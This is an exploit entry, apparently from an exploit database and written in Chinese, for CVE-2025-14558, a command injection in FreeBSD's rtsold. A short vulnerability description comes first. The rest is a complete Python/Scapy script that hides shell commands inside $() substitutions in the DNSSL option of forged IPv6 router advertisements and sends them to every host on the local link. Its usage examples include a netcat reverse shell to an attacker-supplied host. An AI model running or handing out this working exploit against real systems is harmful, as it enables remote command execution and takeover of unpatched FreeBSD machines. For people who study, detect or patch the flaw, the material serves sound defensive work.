Exploit Title: FreeBSD rtsold 15.x - 通过DNSSL实现远程代码执行

Date: 2025-12-16

Exploit Author: Lukas Johannes Möller

Vendor Homepage: https://www.freebsd.org/

Version: FreeBSD 13.x, 14.x, 15.x (2025-12-16补丁之前的版本)

Tested on: FreeBSD 14.1-RELEASE

CVE: CVE-2025-14558

漏洞描述:

rtsold(8) 在处理IPv6路由器广告（Router Advertisement）的DNSSL选项时，未对域名中的Shell元字符进行验证。解码后的域名被传递给resolvconf(8)——一个使用未加引号变量扩展的Shell脚本，从而使得通过$()替换进行命令注入成为可能。

利用条件:

- 与目标设备具有二层网络邻接性

- 目标运行rtsold且启用了ACCEPT_RTADV

- 具有root权限（用于发送RA的原始套接字）

- Python 3 + Scapy

参考链接:

https://security.FreeBSD.org/advisories/FreeBSD-SA-25:12.rtsold.asc

https://github.com/JohannesLks/CVE-2025-14558

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102


import argparse
import struct
import sys
import time

try:
    from scapy.all import (
        Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo,
        ICMPv6NDOptSrcLLAddr, Raw, get_if_hwaddr, sendp
    )
except ImportError:
    sys.exit("[!] 需要Scapy库: pip install scapy")


def encode_domain(name):
    """将域名编码为DNS线格式 (RFC 1035)。"""
    result = b""
    for label in name.split("."):
        if label:
            data = label.encode()
            result += bytes([len(data)]) + data
    return result + b"\x00"


def encode_payload(cmd):
    """将载荷编码为DNS标签，并用$()包装以进行命令替换。"""
    payload = f"$({cmd})".encode()
    if len(payload) > 63:
        # 将长载荷分割到多个标签中（解码时会插入点号）
        result = b""
        while payload:
            chunk = payload[:63]
            payload = payload[63:]
            result += bytes([len(chunk)]) + chunk
        return result + b"\x00"
    return bytes([len(payload)]) + payload + b"\x00"


def build_dnssl(cmd, lifetime=0xFFFFFFFF):
    """构建包含注入命令的DNSSL选项 (RFC 6106)。"""
    data = encode_domain("x.local") + encode_payload(cmd)
    
    # 填充至8字节边界
    pad = (8 - (len(data) + 8) % 8) % 8
    data += b"\x00" * pad
    
    # 类型=31 (DNSSL), 长度以8字节为单位
    length = (8 + len(data)) // 8
    return struct.pack(">BBH", 31, length, 0) + struct.pack(">I", lifetime) + data


def build_ra(mac, payload):
    """构建包含恶意DNSSL的路由器广告包。"""
    return (
        Ether(src=mac, dst="33:33:00:00:00:01")
        / IPv6(src="fe80::1", dst="ff02::1", hlim=255)
        / ICMPv6ND_RA(chlim=64, M=0, O=1, routerlifetime=1800)
        / ICMPv6NDOptSrcLLAddr(lladdr=mac)
        / ICMPv6NDOptPrefixInfo(
            prefixlen=64, L=1, A=1,
            validlifetime=2592000, preferredlifetime=604800,
            prefix="2001:db8::"
        )
        / Raw(load=build_dnssl(payload))
    )


def main():
    p = argparse.ArgumentParser(
        description="CVE-2025-14558 - FreeBSD rtsold DNSSL命令注入漏洞利用",
        epilog="示例:\n"
               "  %(prog)s -i eth0\n"
               "  %(prog)s -i eth0 -p 'id>/tmp/pwned'\n"
               "  %(prog)s -i eth0 -p 'nc LHOST 4444 -e /bin/sh'",
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    p.add_argument("-i", "--interface", required=True, help="网络接口")
    p.add_argument("-p", "--payload", default="touch /tmp/pwned", help="要执行的命令")
    p.add_argument("-c", "--count", type=int, default=3, help="要发送的数据包数量 (默认: 3)")
    args = p.parse_args()

    try:
        mac = get_if_hwaddr(args.interface)
    except Exception as e:
        sys.exit(f"[!] 接口错误: {e}")

    print(f"[*] 接口: {args.interface} ({mac})")
    print(f"[*] 载荷: {args.payload}")

    pkt = build_ra(mac, args.payload)
    
    for i in range(args.count):
        sendp(pkt, iface=args.interface, verbose=False)
        print(f"[+] 已发送RA数据包 {i+1}/{args.count}")
        if i < args.count - 1:
            time.sleep(1)

    print("[+] 完成")


if __name__ == "__main__":
    main()